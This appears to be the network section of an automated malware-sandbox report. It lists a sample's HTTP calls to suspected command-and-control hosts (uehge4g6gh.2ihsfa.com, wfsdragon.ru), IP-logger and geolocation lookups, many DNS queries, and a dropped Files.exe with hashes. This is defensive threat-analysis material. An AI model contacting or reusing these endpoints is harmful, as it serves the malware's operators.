                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
                                                                                                            • 157.240.221.35:443
                                                                                                              www.facebook.com
                                                                                                              tls
                                                                                                              1.0kB
                                                                                                              2.7kB
                                                                                                              8
                                                                                                              6
                                                                                                            • 157.240.221.35:443
                                                                                                              www.facebook.com
                                                                                                              tls
                                                                                                              3.6kB
                                                                                                              33.1kB
                                                                                                              34
                                                                                                              42
                                                                                                            • 163.70.147.4:443
                                                                                                              secure.facebook.com
                                                                                                              tls
                                                                                                              2.6kB
                                                                                                              5.7kB
                                                                                                              16
                                                                                                              18
                                                                                                            • 34.143.166.163:80
                                                                                                              http://www.iyiqian.com/
                                                                                                              http
                                                                                                              469 B
                                                                                                              868 B
                                                                                                              6
                                                                                                              5

                                                                                                              HTTP Request

                                                                                                              GET http://www.iyiqian.com/

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 163.70.147.23:443
                                                                                                              static.xx.fbcdn.net
                                                                                                              tls
                                                                                                              2.8kB
                                                                                                              20.7kB
                                                                                                              31
                                                                                                              32
                                                                                                            • 163.70.147.23:443
                                                                                                              static.xx.fbcdn.net
                                                                                                              tls
                                                                                                              793 B
                                                                                                              2.6kB
                                                                                                              6
                                                                                                              5
                                                                                                            • 163.70.147.23:443
                                                                                                              static.xx.fbcdn.net
                                                                                                              tls
                                                                                                              793 B
                                                                                                              2.6kB
                                                                                                              6
                                                                                                              5
                                                                                                            • 163.70.147.23:443
                                                                                                              static.xx.fbcdn.net
                                                                                                              tls
                                                                                                              839 B
                                                                                                              2.6kB
                                                                                                              7
                                                                                                              5
                                                                                                            • 142.250.200.42:443
                                                                                                              content-autofill.googleapis.com
                                                                                                              tls
                                                                                                              3.5kB
                                                                                                              7.3kB
                                                                                                              21
                                                                                                              18
                                                                                                            • 142.250.200.42:443
                                                                                                              content-autofill.googleapis.com
                                                                                                              tls
                                                                                                              1.5kB
                                                                                                              1.6kB
                                                                                                              10
                                                                                                              6
                                                                                                            • 149.154.167.99:443
                                                                                                              t.me
                                                                                                              tls
                                                                                                              11.8kB
                                                                                                              224.9kB
                                                                                                              151
                                                                                                              200
                                                                                                            • 163.70.147.35:443
                                                                                                              facebook.com
                                                                                                              tls
                                                                                                              1.7kB
                                                                                                              5.1kB
                                                                                                              14
                                                                                                              15
                                                                                                            • 37.0.11.8:80
                                                                                                              156 B
                                                                                                              3
                                                                                                            • 136.144.41.201:80
                                                                                                              208 B
                                                                                                              4
                                                                                                            • 104.21.5.208:80
                                                                                                              http://wfsdragon.ru/api/setStats.php
                                                                                                              http
                                                                                                              535 B
                                                                                                              858 B
                                                                                                              7
                                                                                                              6

                                                                                                              HTTP Request

                                                                                                              GET http://wfsdragon.ru/api/setStats.php

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 212.193.30.115:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 104.21.5.208:80
                                                                                                              http://wfsdragon.ru/api/setStats.php
                                                                                                              http
                                                                                                              639 B
                                                                                                              2.1kB
                                                                                                              9
                                                                                                              8

                                                                                                              HTTP Request

                                                                                                              GET http://wfsdragon.ru/api/setStats.php

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 212.193.30.115:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 212.193.30.115:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 212.193.30.115:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 212.193.30.115:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 212.193.30.115:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 212.193.30.115:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 204.79.197.200:443
                                                                                                              tse1.mm.bing.net
                                                                                                              tls
                                                                                                              1.5kB
                                                                                                              8.2kB
                                                                                                              17
                                                                                                              13
                                                                                                            • 204.79.197.200:443
                                                                                                              tse1.mm.bing.net
                                                                                                              tls
                                                                                                              66.0kB
                                                                                                              1.7MB
                                                                                                              1255
                                                                                                              1249
                                                                                                            • 204.79.197.200:443
                                                                                                              tse1.mm.bing.net
                                                                                                              tls
                                                                                                              1.5kB
                                                                                                              8.2kB
                                                                                                              17
                                                                                                              13
                                                                                                            • 204.79.197.200:443
                                                                                                              tse1.mm.bing.net
                                                                                                              tls
                                                                                                              1.5kB
                                                                                                              8.2kB
                                                                                                              17
                                                                                                              13
                                                                                                            • 204.79.197.200:443
                                                                                                              tse1.mm.bing.net
                                                                                                              tls
                                                                                                              1.4kB
                                                                                                              8.3kB
                                                                                                              16
                                                                                                              14
                                                                                                            • 212.193.30.115:80
                                                                                                              208 B
                                                                                                              4
                                                                                                            • 212.193.30.115:80
                                                                                                              156 B
                                                                                                              3
                                                                                                            • 212.193.30.115:80
                                                                                                              104 B
                                                                                                              2
                                                                                                            • 8.8.8.8:53
                                                                                                              19.177.190.20.in-addr.arpa
                                                                                                              dns
                                                                                                              72 B
                                                                                                              158 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              19.177.190.20.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              158.240.127.40.in-addr.arpa
                                                                                                              dns
                                                                                                              73 B
                                                                                                              147 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              158.240.127.40.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              ip-api.com
                                                                                                              dns
                                                                                                              112 B
                                                                                                              72 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              ip-api.com

                                                                                                              DNS Request

                                                                                                              ip-api.com

                                                                                                              DNS Response

                                                                                                              208.95.112.1

                                                                                                            • 8.8.8.8:53
                                                                                                              www.listincode.com
                                                                                                              dns
                                                                                                              64 B
                                                                                                              80 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              www.listincode.com

                                                                                                              DNS Response

                                                                                                              199.59.243.225

                                                                                                            • 8.8.8.8:53
                                                                                                              ipinfo.io
                                                                                                              dns
                                                                                                              55 B
                                                                                                              71 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              ipinfo.io

                                                                                                              DNS Response

                                                                                                              34.117.186.192

                                                                                                            • 8.8.8.8:53
                                                                                                              95.221.229.192.in-addr.arpa
                                                                                                              dns
                                                                                                              219 B
                                                                                                              144 B
                                                                                                              3
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              95.221.229.192.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              95.221.229.192.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              95.221.229.192.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              192.186.117.34.in-addr.arpa
                                                                                                              dns
                                                                                                              73 B
                                                                                                              126 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              192.186.117.34.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              music-sec.xyz
                                                                                                              dns
                                                                                                              59 B
                                                                                                              124 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              music-sec.xyz

                                                                                                            • 8.8.8.8:53
                                                                                                              iplogger.org
                                                                                                              dns
                                                                                                              58 B
                                                                                                              90 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              iplogger.org

                                                                                                              DNS Response

                                                                                                              172.67.132.113
                                                                                                              104.21.4.208

                                                                                                            • 8.8.8.8:53
                                                                                                              113.132.67.172.in-addr.arpa
                                                                                                              dns
                                                                                                              146 B
                                                                                                              135 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              113.132.67.172.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              113.132.67.172.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              225.243.59.199.in-addr.arpa
                                                                                                              dns
                                                                                                              146 B
                                                                                                              131 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              225.243.59.199.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              225.243.59.199.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              iplogger.org
                                                                                                              dns
                                                                                                              58 B
                                                                                                              90 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              iplogger.org

                                                                                                              DNS Response

                                                                                                              172.67.132.113
                                                                                                              104.21.4.208

                                                                                                            • 8.8.8.8:53
                                                                                                              3.171.2.186.in-addr.arpa
                                                                                                              dns
                                                                                                              140 B
                                                                                                              94 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              3.171.2.186.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              3.171.2.186.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              1.112.95.208.in-addr.arpa
                                                                                                              dns
                                                                                                              142 B
                                                                                                              95 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              1.112.95.208.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              1.112.95.208.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              201.178.17.96.in-addr.arpa
                                                                                                              dns
                                                                                                              216 B
                                                                                                              137 B
                                                                                                              3
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              201.178.17.96.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              201.178.17.96.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              201.178.17.96.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              9.228.82.20.in-addr.arpa
                                                                                                              dns
                                                                                                              70 B
                                                                                                              156 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              9.228.82.20.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              x2.i.lencr.org
                                                                                                              dns
                                                                                                              120 B
                                                                                                              165 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              x2.i.lencr.org

                                                                                                              DNS Request

                                                                                                              x2.i.lencr.org

                                                                                                              DNS Response

                                                                                                              173.222.13.40

                                                                                                            • 8.8.8.8:53
                                                                                                              www.facebook.com
                                                                                                              dns
                                                                                                              124 B
                                                                                                              107 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              www.facebook.com

                                                                                                              DNS Request

                                                                                                              www.facebook.com

                                                                                                              DNS Response

                                                                                                              163.70.147.35

                                                                                                            • 8.8.8.8:53
                                                                                                              x2.c.lencr.org
                                                                                                              dns
                                                                                                              60 B
                                                                                                              165 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              x2.c.lencr.org

                                                                                                              DNS Response

                                                                                                              173.222.13.40

                                                                                                            • 8.8.8.8:53
                                                                                                              40.13.222.173.in-addr.arpa
                                                                                                              dns
                                                                                                              72 B
                                                                                                              137 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              40.13.222.173.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              e1.o.lencr.org
                                                                                                              dns
                                                                                                              60 B
                                                                                                              159 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              e1.o.lencr.org

                                                                                                              DNS Response

                                                                                                              96.17.179.201
                                                                                                              96.17.179.193

                                                                                                            • 8.8.8.8:53
                                                                                                              35.147.70.163.in-addr.arpa
                                                                                                              dns
                                                                                                              72 B
                                                                                                              125 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              35.147.70.163.in-addr.arpa

                                                                                                            • 224.0.0.251:5353
                                                                                                              509 B
                                                                                                              8
                                                                                                            • 8.8.8.8:53
                                                                                                              201.179.17.96.in-addr.arpa
                                                                                                              dns
                                                                                                              72 B
                                                                                                              137 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              201.179.17.96.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              50.23.12.20.in-addr.arpa
                                                                                                              dns
                                                                                                              70 B
                                                                                                              156 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              50.23.12.20.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              43.58.199.20.in-addr.arpa
                                                                                                              dns
                                                                                                              142 B
                                                                                                              157 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              43.58.199.20.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              43.58.199.20.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              humisnee.com
                                                                                                              dns
                                                                                                              58 B
                                                                                                              74 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              humisnee.com

                                                                                                              DNS Response

                                                                                                              185.107.56.199

                                                                                                            • 8.8.8.8:53
                                                                                                              survey-smiles.com
                                                                                                              dns
                                                                                                              63 B
                                                                                                              79 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              survey-smiles.com

                                                                                                              DNS Response

                                                                                                              199.59.243.225

                                                                                                            • 8.8.8.8:53
                                                                                                              199.56.107.185.in-addr.arpa
                                                                                                              dns
                                                                                                              73 B
                                                                                                              134 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              199.56.107.185.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              167.109.18.2.in-addr.arpa
                                                                                                              dns
                                                                                                              71 B
                                                                                                              135 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              167.109.18.2.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              uehge4g6gh.2ihsfa.com
                                                                                                              dns
                                                                                                              67 B
                                                                                                              99 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              uehge4g6gh.2ihsfa.com

                                                                                                              DNS Response

                                                                                                              13.248.169.48
                                                                                                              76.223.54.146

                                                                                                            • 8.8.8.8:53
                                                                                                              146.78.124.51.in-addr.arpa
                                                                                                              dns
                                                                                                              216 B
                                                                                                              158 B
                                                                                                              3
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              146.78.124.51.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              146.78.124.51.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              146.78.124.51.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              www.iyiqian.com
                                                                                                              dns
                                                                                                              183 B
                                                                                                              215 B
                                                                                                              3
                                                                                                              3

                                                                                                              DNS Request

                                                                                                              www.iyiqian.com

                                                                                                              DNS Request

                                                                                                              www.iyiqian.com

                                                                                                              DNS Request

                                                                                                              www.iyiqian.com

                                                                                                              DNS Response

                                                                                                              34.143.166.163

                                                                                                              DNS Response

                                                                                                              34.143.166.163

                                                                                                            • 8.8.8.8:53
                                                                                                              www.facebook.com
                                                                                                              dns
                                                                                                              62 B
                                                                                                              107 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              www.facebook.com

                                                                                                              DNS Response

                                                                                                              157.240.221.35

                                                                                                            • 8.8.8.8:53
                                                                                                              secure.facebook.com
                                                                                                              dns
                                                                                                              65 B
                                                                                                              107 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              secure.facebook.com

                                                                                                              DNS Response

                                                                                                              163.70.147.4

                                                                                                            • 157.240.221.35:443
                                                                                                              www.facebook.com
                                                                                                              https
                                                                                                              45.5kB
                                                                                                              372.2kB
                                                                                                              172
                                                                                                              371
                                                                                                            • 8.8.8.8:53
                                                                                                              static.xx.fbcdn.net
                                                                                                              dns
                                                                                                              130 B
                                                                                                              104 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              static.xx.fbcdn.net

                                                                                                              DNS Request

                                                                                                              static.xx.fbcdn.net

                                                                                                              DNS Response

                                                                                                              163.70.147.23

                                                                                                            • 8.8.8.8:53
                                                                                                              35.221.240.157.in-addr.arpa
                                                                                                              dns
                                                                                                              73 B
                                                                                                              126 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              35.221.240.157.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              4.147.70.163.in-addr.arpa
                                                                                                              dns
                                                                                                              71 B
                                                                                                              121 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              4.147.70.163.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              227.179.250.142.in-addr.arpa
                                                                                                              dns
                                                                                                              74 B
                                                                                                              112 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              227.179.250.142.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              74.169.217.172.in-addr.arpa
                                                                                                              dns
                                                                                                              73 B
                                                                                                              112 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              74.169.217.172.in-addr.arpa

                                                                                                            • 163.70.147.23:443
                                                                                                              static.xx.fbcdn.net
                                                                                                              https
                                                                                                              17.4kB
                                                                                                              391.2kB
                                                                                                              189
                                                                                                              396
                                                                                                            • 8.8.8.8:53
                                                                                                              23.147.70.163.in-addr.arpa
                                                                                                              dns
                                                                                                              144 B
                                                                                                              116 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              23.147.70.163.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              23.147.70.163.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              163.166.143.34.in-addr.arpa
                                                                                                              dns
                                                                                                              146 B
                                                                                                              126 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              163.166.143.34.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              163.166.143.34.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              48.169.248.13.in-addr.arpa
                                                                                                              dns
                                                                                                              144 B
                                                                                                              128 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              48.169.248.13.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              48.169.248.13.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              content-autofill.googleapis.com
                                                                                                              dns
                                                                                                              77 B
                                                                                                              253 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              content-autofill.googleapis.com

                                                                                                              DNS Response

                                                                                                              142.250.200.42
                                                                                                              142.250.200.10
                                                                                                              216.58.201.106
                                                                                                              216.58.204.74
                                                                                                              172.217.169.10
                                                                                                              142.250.179.234
                                                                                                              142.250.180.10
                                                                                                              142.250.187.202
                                                                                                              142.250.187.234
                                                                                                              172.217.16.234
                                                                                                              142.250.178.10

                                                                                                            • 163.70.147.23:443
                                                                                                              static.xx.fbcdn.net
                                                                                                              https
                                                                                                              5.3kB
                                                                                                              21.8kB
                                                                                                              28
                                                                                                              33
                                                                                                            • 8.8.8.8:53
                                                                                                              facebook.com
                                                                                                              dns
                                                                                                              174 B
                                                                                                              74 B
                                                                                                              3
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              facebook.com

                                                                                                              DNS Request

                                                                                                              facebook.com

                                                                                                              DNS Request

                                                                                                              facebook.com

                                                                                                              DNS Response

                                                                                                              163.70.147.35

                                                                                                            • 8.8.8.8:53
                                                                                                              42.200.250.142.in-addr.arpa
                                                                                                              dns
                                                                                                              73 B
                                                                                                              112 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              42.200.250.142.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              t.me
                                                                                                              dns
                                                                                                              50 B
                                                                                                              66 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              t.me

                                                                                                              DNS Response

                                                                                                              149.154.167.99

                                                                                                            • 163.70.147.35:443
                                                                                                              facebook.com
                                                                                                              https
                                                                                                              5.0kB
                                                                                                              13.2kB
                                                                                                              21
                                                                                                              19
                                                                                                            • 8.8.8.8:53
                                                                                                              ninhaine.com
                                                                                                              dns
                                                                                                              116 B
                                                                                                              131 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              ninhaine.com

                                                                                                              DNS Request

                                                                                                              ninhaine.com

                                                                                                            • 8.8.8.8:53
                                                                                                              2makestorage.com
                                                                                                              dns
                                                                                                              186 B
                                                                                                              135 B
                                                                                                              3
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              2makestorage.com

                                                                                                              DNS Request

                                                                                                              2makestorage.com

                                                                                                              DNS Request

                                                                                                              2makestorage.com

                                                                                                            • 8.8.8.8:53
                                                                                                              99.167.154.149.in-addr.arpa
                                                                                                              dns
                                                                                                              73 B
                                                                                                              166 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              99.167.154.149.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              nisdably.com
                                                                                                              dns
                                                                                                              232 B
                                                                                                              233 B
                                                                                                              4
                                                                                                              3

                                                                                                              DNS Request

                                                                                                              nisdably.com

                                                                                                              DNS Request

                                                                                                              nisdably.com

                                                                                                              DNS Request

                                                                                                              nisdably.com

                                                                                                              DNS Request

                                                                                                              nisdably.com

                                                                                                            • 8.8.8.8:53
                                                                                                              aucmoney.com
                                                                                                              dns
                                                                                                              58 B
                                                                                                              131 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              aucmoney.com

                                                                                                            • 8.8.8.8:53
                                                                                                              thegymmum.com
                                                                                                              dns
                                                                                                              59 B
                                                                                                              132 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              thegymmum.com

                                                                                                            • 8.8.8.8:53
                                                                                                              fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com
                                                                                                              dns
                                                                                                              95 B
                                                                                                              168 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com

                                                                                                            • 8.8.8.8:53
                                                                                                              atvcampingtrips.com
                                                                                                              dns
                                                                                                              65 B
                                                                                                              138 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              atvcampingtrips.com

                                                                                                            • 8.8.8.8:53
                                                                                                              server2.ninhaine.com
                                                                                                              dns
                                                                                                              66 B
                                                                                                              139 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              server2.ninhaine.com

                                                                                                            • 8.8.8.8:53
                                                                                                              kuapakualaman.com
                                                                                                              dns
                                                                                                              189 B
                                                                                                              136 B
                                                                                                              3
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              kuapakualaman.com

                                                                                                              DNS Request

                                                                                                              kuapakualaman.com

                                                                                                              DNS Request

                                                                                                              kuapakualaman.com

                                                                                                            • 8.8.8.8:53
                                                                                                              renatazarazua.com
                                                                                                              dns
                                                                                                              126 B
                                                                                                              136 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              renatazarazua.com

                                                                                                              DNS Request

                                                                                                              renatazarazua.com

                                                                                                            • 8.8.8.8:53
                                                                                                              nasufmutlu.com
                                                                                                              dns
                                                                                                              60 B
                                                                                                              133 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              nasufmutlu.com

                                                                                                            • 8.8.8.8:53
                                                                                                              server2.ninhaine.com
                                                                                                              dns
                                                                                                              66 B
                                                                                                              139 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              server2.ninhaine.com

                                                                                                            • 8.8.8.8:53
                                                                                                              spolaect.info
                                                                                                              dns
                                                                                                              118 B
                                                                                                              2

                                                                                                              DNS Request

                                                                                                              spolaect.info

                                                                                                              DNS Request

                                                                                                              spolaect.info

                                                                                                            • 8.8.8.8:53
                                                                                                              wfsdragon.ru
                                                                                                              dns
                                                                                                              58 B
                                                                                                              90 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              wfsdragon.ru

                                                                                                              DNS Response

                                                                                                              104.21.5.208
                                                                                                              172.67.133.215

                                                                                                            • 8.8.8.8:53
                                                                                                              208.5.21.104.in-addr.arpa
                                                                                                              dns
                                                                                                              71 B
                                                                                                              133 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              208.5.21.104.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              88.156.103.20.in-addr.arpa
                                                                                                              dns
                                                                                                              144 B
                                                                                                              158 B
                                                                                                              2
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              88.156.103.20.in-addr.arpa

                                                                                                              DNS Request

                                                                                                              88.156.103.20.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              22.236.111.52.in-addr.arpa
                                                                                                              dns
                                                                                                              72 B
                                                                                                              158 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              22.236.111.52.in-addr.arpa

                                                                                                            • 8.8.8.8:53
                                                                                                              tse1.mm.bing.net
                                                                                                              dns
                                                                                                              62 B
                                                                                                              173 B
                                                                                                              1
                                                                                                              1

                                                                                                              DNS Request

                                                                                                              tse1.mm.bing.net

                                                                                                              DNS Response

                                                                                                              204.79.197.200
                                                                                                              13.107.21.200

                                                                                                            • 8.8.8.8:53
                                                                                                              dns
                                                                                                              139 B
                                                                                                              1

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                              Filesize

                                                                                                              180B

                                                                                                              MD5

                                                                                                              4bc8a3540a546cfe044e0ed1a0a22a95

                                                                                                              SHA1

                                                                                                              5387f78f1816dee5393bfca1fffe49cede5f59c1

                                                                                                              SHA256

                                                                                                              f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca

                                                                                                              SHA512

                                                                                                              e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files.exe

                                                                                                              Filesize

                                                                                                              975KB

